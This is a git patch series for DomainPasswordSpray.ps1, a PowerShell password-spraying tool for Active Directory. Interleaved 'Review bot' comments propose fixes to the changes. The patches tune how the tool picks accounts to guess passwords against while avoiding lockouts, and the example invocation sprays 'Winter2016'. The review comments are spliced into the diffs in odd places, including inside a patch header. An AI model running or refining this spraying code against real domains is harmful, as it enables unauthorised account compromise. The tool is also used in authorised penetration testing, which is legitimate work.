From 22f345a5a52e50a6995687cd22f49ebb33347b97 Mon Sep 17 00:00:00 2001
From: Martin
Date: Tue, 18 May 2021 15:57:26 +0100
Subject: [PATCH 1/4] Added 'MinAttemptsUntilLockout' parameter
---
 DomainPasswordSpray.ps1 | 26 ++++++++++++++++++++++----
 1 file changed, 22 insertions(+), 4 deletions(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index 3395c47..b3a412c 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -46,6 +46,10 @@ function Invoke-DomainPasswordSpray{ For each user, will try that user's name as their password + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE C:\PS> Invoke-DomainPasswordSpray -Password Winter2016
@@ -109,7 +113,10 @@ function Invoke-DomainPasswordSpray{ $Delay=0, [Parameter(Position = 9, Mandatory = $false)] - $Jitter=0 + $Jitter=0, + + [Parameter(Position = 10, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 )
@@ -155,7 +162,7 @@ function Invoke-DomainPasswordSpray{ if ($UserList -eq "") { - $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter + $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter -MinAttemptsUntilLockout $MinAttemptsUntilLockout } else {
@@ -281,6 +288,10 @@ function Get-DomainUserList Custom LDAP filter for users, e.g. "(description=*admin*)" + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE PS C:\> Get-DomainUserList 
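Review bot: The new .PARAMETER text in this hunk says accounts with *more than* this number of attempts left are kept, but the filter changed in the @@ -455 hunk uses `-ge $MinAttemptsUntilLockout`, so at the default of 2 an account with exactly 2 attempts left is included; the same wording is repeated in the Get-DomainUserList help block added in the @@ -281 hunk. The warning added in the @@ -313 hunk ("locked upon 1 bad attempt") only makes sense under `-ge`, so the help text is the part to fix: reword both entries to `Limit password spraying to accounts with at least this many attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!).` The comment above the condition, `# if there is more than 1 attempt left before a user locks out`, is stale for the same reason and should name `$MinAttemptsUntilLockout` instead of the literal 1. Invoke-DomainPasswordSpray's body continues outside this hunk.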
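Review bot: `$MinAttemptsUntilLockout = 2` in the Position 10 parameter block carries no type or range constraint, unlike `[string] $Filter` in Get-DomainUserList, so 0 or a negative number binds without error and then makes the `-ge` comparison in the @@ -455 hunk true for every account (assuming `$attemptsuntillockout` is numeric, which is computed outside these hunks). The Position 4 parameter added to Get-DomainUserList in the @@ -313 hunk has the same gap. Constraining both declarations, `[ValidateRange(1, [int]::MaxValue)]` followed by `[int]$MinAttemptsUntilLockout = 2`, rejects those values at bind time with a clear error instead of silently widening the list. The enclosing param block begins before this hunk.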
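Review bot: The new `-MinAttemptsUntilLockout $MinAttemptsUntilLockout` argument is only passed on the `$UserList -eq ""` path; when a caller supplies -UserList the value is accepted but, as far as this hunk shows, never read (the else branch body is outside the hunk). If that is intended, say so in the .PARAMETER entry, e.g. `Only applies when no -UserList is given; a supplied list is used as-is.`; otherwise the else branch should at least emit a warning that the threshold is being ignored, since a caller will reasonably assume it applies to both paths.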
@@ -313,9 +324,16 @@ function Get-DomainUserList [Parameter(Position = 3, Mandatory = $false)] [string] - $Filter + $Filter, + + [Parameter(Position = 4, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 ) + if($MinAttemptsUntilLockout -eq 1) { + Write-Host -ForegroundColor Red "[*] Warning! 'MinAttemptsUntilLockout' set to 1. This means the attack could target accounts which will be locked upon 1 bad attempt (the attempt you are about to perform)!" + } + try { if ($Domain -ne "")
@@ -455,7 +473,7 @@ function Get-DomainUserList # if there is more than 1 attempt left before a user locks out # or if the time since the last failed login is greater than the domain # observation window add user to spray list - if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -gt 1)) + if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout)) { $UserListArray += $samaccountname }
From 2bfdb5df8848c5eb9a65ceda8ba2f2666ce1f1f7 Mon Sep 17 00:00:00 2001
From: Martin
Date: Tue, 18 May 2021 16:01:42 +0100
Subject: [PATCH 2/4] Remove irrelevant console line if no output file is specified
---
 DomainPasswordSpray.ps1 | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index b3a412c..b8f03cc 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -521,7 +521,10 @@ function Invoke-SpraySinglePassword $count = $UserListArray.count Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())" $curr_user = 0 - Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + if ($OutFile -ne "") + { + Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + } $RandNo = New-Object System.Random foreach ($User in $UserListArray)
From 5804a85166ffacd6ec7c27d75ea6f5cbb3b44722 Mon Sep 17 00:00:00 2001 
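Review bot: The guard `if($MinAttemptsUntilLockout -eq 1)` fires only for exactly 1; a value of 0 or below passes silently, and with it the `-ge $MinAttemptsUntilLockout` comparison in the @@ -455 hunk accepts every account regardless of how many attempts it has left. `if ($MinAttemptsUntilLockout -le 1)` covers those cases with the same message. Emitting it via `Write-Warning` rather than `Write-Host -ForegroundColor Red` also puts it on the warning stream, where `-WarningAction` and transcripts can see it instead of it being lost in host output. Get-DomainUserList's body continues past the end of this hunk.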
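Review bot: `if ($OutFile -ne "")` suppresses the message only when the parameter is exactly the empty string; the parameter's declaration is outside this hunk, and if its default is `$null` (an untyped parameter with no default) the comparison is still true and the line prints exactly as it did before the change. `if (-not [string]::IsNullOrEmpty($OutFile))` handles both the empty-string and the `$null` case. Invoke-SpraySinglePassword's body continues on both sides of the hunk.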
From: Martin
Date: Tue, 18 May 2021 16:15:48 +0100
Subject: [PATCH 3/4] Ignore console line if only testing one password
---
 DomainPasswordSpray.ps1 | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index b8f03cc..d0f9fb0 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -181,18 +181,16 @@ function Invoke-DomainPasswordSpray{ } } + + $observation_window = Get-ObservationWindow $CurrentDomain + Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." if ($Passwords.count -gt 1) - { Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!" + Write-Host "[*] Setting a $observation_window minute wait in between sprays." } - $observation_window = Get-ObservationWindow $CurrentDomain - - Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - Write-Host "[*] Setting a $observation_window minute wait in between sprays." - # if no force flag is set we will ask if the user is sure they want to spray if (!$Force) {
From aa5d139f3dcac712b6d876e7208ba112f799335b Mon Sep 17 00:00:00 2001
From: Martin
Date: Tue, 18 May 2021 16:19:55 +0100
Subject: [PATCH 4/4] Missing bracket
---
 DomainPasswordSpray.ps1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index d0f9fb0..8840398 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
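Review bot: As committed, this hunk removes the `{` that opened the `if ($Passwords.count -gt 1)` body while keeping the closing `}`, so the script does not parse at this revision; the following patch in the series ("Missing bracket") restores it. Squashing that one-character fix into this commit keeps every revision of the series loadable, which matters for anyone bisecting later. Moving `$observation_window = Get-ObservationWindow $CurrentDomain` above the count check is otherwise fine, since the value is now computed before the line that interpolates it. Invoke-DomainPasswordSpray continues outside the hunk on both sides.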
@@ -186,7 +186,7 @@ function Invoke-DomainPasswordSpray{ Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - if ($Passwords.count -gt 1) + if ($Passwords.count -gt 1) { Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!" Write-Host "[*] Setting a $observation_window minute wait in between sprays." }